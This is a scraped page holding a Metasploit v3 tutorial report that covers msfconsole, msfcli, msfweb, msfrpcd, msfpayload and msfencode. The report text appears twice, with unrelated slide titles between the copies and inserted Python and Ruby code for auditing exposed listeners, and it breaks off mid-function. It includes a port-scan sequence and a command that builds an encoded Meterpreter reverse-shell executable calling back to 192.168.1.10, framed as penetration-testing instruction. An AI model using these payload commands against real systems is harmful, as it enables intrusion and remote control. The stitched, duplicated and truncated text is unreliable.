Project Report on Metasploit
Project by - Nutan Kumar Panda
Technology Evangelist ISEH
R&D - ATL Guwahati

Metasploit
The MSF is an open-source tool which provides a framework for security researchers to develop exploits, payloads, payload encoders, and tools for reconnaissance and other security testing purposes. Although it initially started off as a collection of exploits and provided the ability for large chunks of code to be re-used across different exploits, in its current form it provides extensive capabilities for the design and development of reconnaissance, exploitation, and post-exploitation security tools.

Exploitation
Exploitation involves code that performs a number of key functions, such as:
Connecting to the remote system on the vulnerable port.
Exchanging the initial protocol sequence until the vulnerable fault injection point is reached.
Injecting exploit code, which includes instructions for the return address to be modified to point directly or indirectly into our payload, as well as NOP instructions, which increase the chances that our code will eventually be executed.
Post-exploitation fun, which could be either connecting to a command prompt bound to a listening port on the compromised system, connecting to the remote system with the username and password of a user that has been created as part of the exploit process, or connecting with a GUI client to a remote GUI (such as VNC).

Understanding Metasploit Channels
The latest version of Metasploit now provides the user with multiple channels to interface with it. These allow a very high degree of flexibility for different requirements or situations such as:
A single user exploiting multiple targets during one session, either in interactive or in batch mode.
Opening multiple payload sessions at once.
Suspending and restoring payload sessions.
Sharing payload sessions with other users.
A group of penetration testers collaborating on testing the same network or different networks.
A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.
The channels available with Metasploit v3.x are listed below:
[Figure: Metasploit v3.x channels]
[Figure: The Directory Structure of the Framework]

Updating Metasploit
The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through an HTTP proxy server, please see the Subversion FAQ on proxy access:
http://subversion.tigris.org/faq.html#proxy
One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g. before every use), you give yourself the best chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you've downloaded Metasploit, you keep it up to date simply by using your Subversion client of choice to "update" the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:
svn update
At revision 4532.
This isn't a particularly exciting example because my Metasploit was already up to date, but then again, that's a good thing.
If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:
svn update
UU modules/nops/ppc/simple.rb
UU modules/nops/x86/opty2.rb
UU modules/nops/x86/single_byte.rb
UU modules/nops/nop_test.rb.ut.rb
A modules/nops/php
A modules/nops/php/generic.rb
UU modules/nops/sparc/random.rb
...
Updated to version 4532

Msfopcode
The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site. With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are listed when executing this utility with the -h switch. This interface is merely a front end to the ex::Exploitation::OpcodeDb::Client class interface, which talks to an HTTP-based XML protocol running on the Metasploit.com Web server.
./msfopcode
Usage: msfopcode command
SUPPORTED COMMANDS
stats      Display database statistics
locales    Display supported locales
metatypes  Display supported opcode meta types (Ex: imp reg)
groups     Display supported opcode groups (Ex: esp=>eip)
types      Display supported opcode types (Ex: imp esp)
platforms  Display supported platforms
modules    Display information about specific modules
search     Search for opcodes given a set of criteria
The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated.
The output of this command looks something like this:
./msfopcode stats
Last Updated : Sat Sep 03 01:32:00 CDT 2005
Number of Opcodes : 12177419
Number of Opcode Types : 320
Number of Platforms : 14
Number of Architectures : 1
Number of Modules : 17683
Number of Module Segments : 71457
Number of Module Imports : 2065492
Number of Module Exports : 927637

Msfrpc / Msfrpcd
The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, this service listens on port 55553, uses SSL, and is password protected. The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.
[ USAGE ]
To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.
./msfrpcd -P s3cr3tp4ss
- or -
msf> load xmlrpc Pass=password
Once the interface is started, any compatible RPC client can be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.
./msfrpc -h server_name -P s3cr3tp4ss
[*] The 'rpc' object holds the RPC client interface
>> rpc.call("core.version")
=> {"version"=>"3.3-dev"}

Msfd
The msfd utility opens a network interface to the msfconsole. It can be executed by specifying the IP address and the port on which it should listen for incoming connections. This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:
msfd -a 192.168.137.128 -d -p 55554

Msfelfscan / Msfpescan / Msfmachscan
Msfelfscan is used to locate interesting addresses within Executable and Linkable Format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows binaries.

Auxiliary Modules
Auxiliary modules are essentially used to cover the first stage of a penetration test: fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user-specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for the Distributed Computing Environment Remote Procedure Call (DCERPC), HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols.
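The Msfrpc/Msfrpcd section above shows rpc.call("core.version") answering {"version"=>"3.3-dev"}, but not what actually crosses the wire between the msfrpc client and the xmlrpc plugin. The following is an added example written for this edit, not code from the report or from the Metasploit project: it builds both sides of that XML-RPC exchange with Python's standard library serializer, a client call, a constructed server-side dispatcher that answers core.version and returns an XML-RPC fault for unknown methods, and the client-side parsing of the reply. The method table, the version string and the fault code are constructed stand-ins; the daemon's SSL transport, password authentication and real method set are not modelled.

```python
"""Added example (not from the report): the msfrpc core.version exchange as
XML-RPC messages. msfrpcd speaks XML-RPC, so xmlrpc.client's dumps()/loads()
produce and consume the same message shapes; the server side here is a
constructed stand-in with a single method."""
import xmlrpc.client

# Constructed server-side method table; the real daemon exposes far more.
SERVER_METHODS = {
    "core.version": lambda: {"version": "3.3-dev"},
}


def build_call(method, *params):
    """Client side: serialise a <methodCall> exactly as an XML-RPC client does."""
    return xmlrpc.client.dumps(params, methodname=method)


def handle_call(request_xml):
    """Server side: decode the request, dispatch it, serialise the reply.
    An unknown method becomes an XML-RPC <fault> (constructed code -32601)
    instead of an exception that would kill the listener."""
    params, method = xmlrpc.client.loads(request_xml)
    handler = SERVER_METHODS.get(method)
    if handler is None:
        fault = xmlrpc.client.Fault(-32601, "Unknown method: %s" % method)
        return xmlrpc.client.dumps(fault, methodresponse=True)
    result = handler(*params)
    return xmlrpc.client.dumps((result,), methodresponse=True)


def parse_response(response_xml):
    """Client side: loads() raises Fault for a <fault> reply, so normalise both
    outcomes into a dict the caller can branch on."""
    try:
        params, _ = xmlrpc.client.loads(response_xml)
    except xmlrpc.client.Fault as fault:
        return {"ok": False, "code": fault.faultCode, "message": fault.faultString}
    return {"ok": True, "value": params[0]}


def rpc_call(method, *params):
    """Round-trip one call through the constructed server, like rpc.call()."""
    return parse_response(handle_call(build_call(method, *params)))


if __name__ == "__main__":
    print(build_call("core.version"))      # the XML the client sends
    print(handle_call(build_call("core.version")))  # the XML the server returns
    print(rpc_call("core.version"))        # {'ok': True, 'value': {'version': '3.3-dev'}}
    print(rpc_call("core.nosuch"))         # fault path
```

Printing build_call and handle_call shows the `<methodCall>`/`<methodResponse>` documents that the password-protected SSL channel on port 55553 carries; a defender capturing that traffic in the clear (for example from a misconfigured plugin instance) would see exactly these structures.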
Any exploitation code that does not use a payload would be part of the auxiliary module system. This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).
List all auxiliary modules
Metasploit 3.0 supports auxiliary modules which can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing.
Now use the appropriate auxiliary module as per your requirement:
msf > use scanner/portscan/tcp
msf > show options
msf > set rhosts 192.168.1.100
(or a range, e.g. set rhosts 192.168.1.1/24)
msf > set ports 1-1024
msf > run
[Figure: TCP portscan result]

Msfgui
The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear in the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.
This new GUI is multi-platform and is based on Java; the NetBeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interfaces.
The GUI can be run by invoking the msfgui script at the base of the Metasploit directory:
./msfgui
[Figure: The Metasploit Graphical User Interface]

Msfcli
The msfcli interface allows exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability. A simple shell script can be written which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the -h switch gives us the options available with this interface. A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:
1. Display information about a selected exploit: ./msfcli <exploit_name> S
2. Show available payloads: ./msfcli <exploit_name> P
3. Choose the payload for this exploit, and display the options that need to be set: ./msfcli <exploit_name> PAYLOAD=<payload_name> O
4. List available targets: ./msfcli <exploit_name> PAYLOAD=<payload_name> T
5. Set the required options in option=value form and execute with the E mode.
[Figure: Exploiting a Windows box with msfcli]

Msfweb
The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).
The main msfweb interface consists of a toolbar containing various icons and a background with the Metasploit logo.
If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, configuring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.
The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the -h switch, as shown in the following example:
./msfweb -h
Usage: msfweb <options>
OPTIONS:
-a <opt>  Bind to this IP address instead of loopback
-d        Daemonize the web server
-h        Help banner
-p <opt>  Bind to this port instead of 55555
-v <opt>  A number between 0 and 3 that controls log verbosity
For instance, the following command would launch the Web interface on IP address 192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).
./msfweb -a 192.168.1.10 -d
Now in any browser type the URL:
http://192.168.1.10:55555

Msfencode
The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed using the -l option. Other options are available using the -h switch.
A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability.
Let's say we want to encode the payload, but limit ourselves to alphanumeric output. We would also like to avoid the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command. As can be seen, the size of the output increases due to the encoding: it was 116 bytes after running the msfpayload command where we redirected the raw output to the file in_exec_raw, but when this file is given as input to the encoder, it is 296 bytes.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe
[Figure: Generating an encoded executable Meterpreter reverse payload]

Msfpayload
The msfpayload utility enables the user to modify existing payloads depending on parameters supplied on the command line, and obtain the output in C, Perl, Ruby or Raw form. The following example illustrates the use of msfpayload. The msfpayload -h command lists the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific payload.
After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload, and produce output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output in Raw format, which allows it to be piped to another program, such as msfencode, or redirected to a file.
As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created which would execute that particular command upon successful exploitation. We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:
./msfpayload windows/exec CMD=calc.exe P

Msfconsole
The msfconsole is the traditional and primary means of using the MSF. After installation, the console can simply be launched by typing the command ./msfconsole (for UNIX) or msfconsole (for Windows) from within the path where it has been installed. The prompt that appears, as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, and the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the console, the intuitive command to type is help, and its output is shown below.
[Figure: Launching the MSF console]
[Figure: Output of the help or ? command]
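The Msfd and Msfweb sections above describe daemons that can be bound to an arbitrary IP address (msfd -a 192.168.137.128, msfweb -a 192.168.1.10), and the report states that msfweb offers no security whatsoever, while msfrpcd is at least password-protected over SSL. The check a defender, or a tester hardening their own attack host, would want is whether any of these listeners is reachable from beyond loopback. The following is an added example written for this edit, not code from the report or from the Metasploit project: it parses listening-socket lines in the `ss -ltnp` column layout and flags the Metasploit service ports the report names (55553 msfrpcd, 55554 msfd, 55555 msfweb) whenever they are bound to a non-loopback address. The sample socket listing is constructed, and the per-service notes are this example's own reading of the report.

```python
"""Added example (not from the report): flag Metasploit daemons that listen on
non-loopback addresses. Input is text in the `ss -ltnp` layout; the sample
below is constructed, not captured from a real host."""
import ipaddress
import re

# Port -> (service, note). Ports come from the report; notes summarise what the
# report says about each service's own protection.
MSF_SERVICES = {
    55553: ("msfrpcd", "password-protected over SSL per the report, still full framework control"),
    55554: ("msfd", "remote msfconsole; the report shows no authentication option"),
    55555: ("msfweb", "the report states it offers no security whatsoever"),
}

# Constructed sample in the `ss -ltnp` column layout:
# State Recv-Q Send-Q Local:Port Peer:Port Process
SAMPLE_SS_OUTPUT = """State  Recv-Q Send-Q Local Address:Port    Peer Address:Port Process
LISTEN 0      128    127.0.0.1:55555       0.0.0.0:*         users:(("ruby",pid=4021,fd=7))
LISTEN 0      128    192.168.137.128:55554 0.0.0.0:*         users:(("ruby",pid=4030,fd=6))
LISTEN 0      128    0.0.0.0:55553         0.0.0.0:*         users:(("ruby",pid=4040,fd=8))
LISTEN 0      128    [::1]:55553           [::]:*            users:(("ruby",pid=4040,fd=9))
LISTEN 0      128    *:22                  *:*               users:(("sshd",pid=812,fd=3))
"""


def split_local_address(field):
    """Split 'addr:port' into (addr, port); handles '[v6]:port' and the '*' wildcard."""
    addr, port = field.rsplit(":", 1)
    return addr.strip("[]"), int(port)


def is_loopback(addr):
    """True only for 127.0.0.0/8 or ::1. Wildcards ('*', '0.0.0.0', '::') mean
    every interface, so they are deliberately reported as not loopback."""
    if addr in ("*", ""):
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def parse_listeners(text):
    """Yield (addr, port, process) for every LISTEN row; the header row and
    malformed lines are skipped rather than raising."""
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        addr, port = split_local_address(cols[3])
        match = re.search(r'\("([^"]+)"', line)
        yield addr, port, match.group(1) if match else ""


def find_exposed_msf_services(text):
    """Return one finding per Metasploit service port bound beyond loopback."""
    findings = []
    for addr, port, proc in parse_listeners(text):
        if port not in MSF_SERVICES or is_loopback(addr):
            continue
        name, note = MSF_SERVICES[port]
        findings.append({"service": name, "bind": addr, "port": port,
                         "process": proc, "note": note})
    return findings


if __name__ == "__main__":
    for f in find_exposed_msf_services(SAMPLE_SS_OUTPUT):
        print("%s bound to %s:%d (%s): %s"
              % (f["service"], f["bind"], f["port"], f["process"], f["note"]))
```

On the constructed sample the loopback msfweb and the [::1] msfrpcd socket pass, while msfd on 192.168.137.128 and msfrpcd on the 0.0.0.0 wildcard are reported; feeding the function the real output of `ss -ltnp` on a Metasploit host gives the same exposure list for that host.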
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 

Backtrack Manual Part6

  • Sharing payload sessions with other users.
  • A group of penetration testers collaborating on testing the same network or different networks.
  • A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.

The channels available with Metasploit v3.x are listed below:

The Directory Structure of the Framework

Updating Metasploit

The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through an HTTP proxy server, please see the Subversion FAQ on proxy access:

http://subversion.tigris.org/faq.html#proxy

One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g. before every use), you give yourself the best chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you have downloaded Metasploit, you keep it up to date simply by using your Subversion client of choice to "update" the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:

svn update
At revision 4532.

This isn't a particularly exciting example because my Metasploit was already up to date, but then again, that's a good thing.
If your Metasploit was in need of updating, you would see a list of file modifications and additions more like this:

svn update
UU modules/nops/ppc/simple.rb
UU modules/nops/x86/opty2.rb
UU modules/nops/x86/single_byte.rb
UU modules/nops/nop_test.rb.ut.rb
A  modules/nops/php
A  modules/nops/php/generic.rb
UU modules/nops/sparc/random.rb
...
Updated to version 4532

Msfopcode

The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site. With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are shown when executing this utility with the -h switch. This interface is merely a front end to the Rex::Exploitation::OpcodeDb::Client class, which speaks an HTTP-based XML protocol to the Metasploit.com Web server.

./msfopcode
Usage: msfopcode command

SUPPORTED COMMANDS
  stats      Display database statistics
  locales    Display supported locales
  metatypes  Display supported opcode meta types (Ex: imp reg)
  groups     Display supported opcode groups (Ex: esp=>eip)
  types      Display supported opcode types (Ex: imp esp)
  platforms  Display supported platforms
  modules    Display information about specific modules
  search     Search for opcodes given a set of criteria

The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated.
The output of this command looks something like this:

./msfopcode stats
Last Updated             : Sat Sep 03 01:32:00 CDT 2005
Number of Opcodes        : 12177419
Number of Opcode Types   : 320
Number of Platforms      : 14
Number of Architectures  : 1
Number of Modules        : 17683
Number of Module Segments: 71457
Number of Module Imports : 2065492
Number of Module Exports : 927637

Msfrpc / Msfrpcd

The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, this service listens on port 55553, uses SSL, and is password protected. The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.

[ USAGE ]

To activate the RPC interface, launch msfrpcd, or start msfconsole and load the xmlrpc plugin:

./msfrpcd -P s3cr3tp4ss
- or -
msf> load xmlrpc Pass=password

Once the interface is started, any compatible RPC client can be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service:

./msfrpc -h server_name -P s3cr3tp4ss
[*] The 'rpc' object holds the RPC client interface
>> rpc.call("core.version")
=> {"version"=>"3.3-dev"}

Msfd

The msfd utility opens a network interface to the msfconsole. It is executed by specifying the IP address and the port on which it should listen for incoming connections. This allows a single user or multiple users to connect from a remote system to the framework.
For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:

msfd -a 192.168.137.128 -d -p 55554

Msfelfscan / Msfpescan / Msfmachscan

Msfelfscan is used to locate interesting addresses within Executable and Linkable Format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows (PE) binaries, and Msfmachscan for Mach-O binaries.

Auxiliary Modules

Auxiliary modules are essentially used to cover the first stage of a penetration test: fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user-specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for the Distributed Computing Environment Remote Procedure Call (DCERPC), HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols.
Any exploitation code that does not use a payload would be part of the auxiliary module system. This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).

List all auxiliary modules

Metasploit 3.0 supports auxiliary modules, which can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing.

Now use the appropriate auxiliary module as per your requirement:

msf > use scanner/portscan/tcp
msf > show options
msf > set rhosts 192.168.1.100      (a single host, or a range such as 192.168.1.1/24)
msf > set ports 1-1024
msf > run

TCP portscan result

Msfgui

The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear in the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.

This new GUI is multi-platform and is based on Java. The NetBeans project for it can be found in the external/source/gui/msfguijava/ directory, for those who want to contribute and have ninja skills with Java and user interfaces.
The GUI can be run by invoking the msfgui script at the base of the Metasploit directory:

./msfgui

The Metasploit Graphical User Interface

Msfcli

The msfcli interface allows exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability: a simple shell script can be written which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the -h switch lists the options available with this interface. A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:

1. Display information about a selected exploit: ./msfcli <exploit_name> S
2. Show available payloads: ./msfcli <exploit_name> P
3. Choose the payload to use with this exploit, and display the options that need to be set: ./msfcli <exploit_name> PAYLOAD=<payload_name> O
4. List available targets: ./msfcli <exploit_name> PAYLOAD=<payload_name> T
5. Set the required options in option=value form and execute with the E mode.

Exploiting a Windows box with Msfcli

Msfweb

The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).

The main msfweb interface consists of a toolbar containing various icons and a background with the Metasploit logo.
If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, configuring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.

The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the -h switch, as shown in the following example:

./msfweb -h
Usage: msfweb <options>

OPTIONS:
  -a <opt>  Bind to this IP address instead of loopback
  -d        Daemonize the web server
  -h        Help banner
  -p <opt>  Bind to this port instead of 55555
  -v <opt>  A number between 0 and 3 that controls log verbosity

For instance, the following command would launch the Web interface on IP address 192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).

./msfweb -a 192.168.1.10 -d

Now, in any browser, open the URL:

http://192.168.1.10:55555

Msfencode

The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed using the -l option. The other available options are shown with the -h switch.

A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability.
Let's say we want to encode the payload, but limit ourselves to an alphanumeric output. We would also like to prevent the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command. As can be seen, the size of the output has increased due to the encoding: it was 116 bytes after running the msfpayload command, where we redirected the output in raw format to the file in_exec_raw, but when this file is given as input to the encoder, the result is 296 bytes.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe

Generating an encoded executable Meterpreter reverse payload

Msfpayload

The msfpayload utility enables the user to modify existing payloads depending on parameters supplied on the command line, and to obtain the output in C, Perl, Ruby or Raw form. The following example illustrates the use of msfpayload. The msfpayload -h command lists the options that can be used along with all the available payloads. We now need to select a payload. The S option shows information about a specific payload.

After selecting a particular payload to work with, we can then have msfpayload modify values within the payload, and produce output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output in Raw format, which allows it to be piped to another program, such as msfencode, or redirected to a file.
As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created which executes that particular command upon successful exploitation. We will set it to a very straightforward command (calc.exe in the example below) and obtain the output for inclusion in a Perl script, as shown below:

./msfpayload windows/exec CMD=calc.exe P

Msfconsole

The msfconsole is the traditional and primary means of using the MSF. After installation, the console can simply be launched by typing the command ./msfconsole (for UNIX) or msfconsole (for Windows) from within the path where it has been installed. The prompt that appears, as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, and the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the console, the intuitive command to type is help, and its output is shown below.

Launching the MSF console

Output of the help or ? command
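The manual describes three network front ends with different default bindings and protections: msfrpcd on port 55553 (SSL, password-protected), msfd on 55554 (msfconsole over the network) and msfweb on 55555 (loopback by default, no security whatsoever). Anyone running a shared test box will want to confirm that none of them is reachable beyond the loopback interface. The Ruby below is an added example, not part of the Backtrack manual or of the Metasploit project: it parses listener lines in the layout of `ss -ltn` or `netstat -ltn` (the sample lines are constructed, not captured from a host) and flags Metasploit services bound to a non-loopback address. The port numbers are the manual's defaults; the service descriptions and the helper names are this example's own.

```ruby
# Added example, not from the Backtrack manual or Metasploit: audit listening
# sockets for Metasploit front ends reachable beyond loopback. Port numbers are
# the manual's defaults; descriptions and helper names are this example's own.

MSF_SERVICES = {
  55553 => "msfrpcd (xmlrpc, SSL, password-protected)",
  55554 => "msfd (msfconsole over the network)",
  55555 => "msfweb (no authentication)",
}.freeze

LOOPBACK = ["127.0.0.1", "::1", "localhost"].freeze

# Parse one `ss -ltn` / `netstat -ltn` style line into [address, port].
# Returns nil for header lines and lines without a local address field.
# Accepts "0.0.0.0:55555", "[::]:55553" and the "*:55554" wildcard spelling;
# the peer column ("0.0.0.0:*") never matches because the port must be numeric.
def parse_listener(line)
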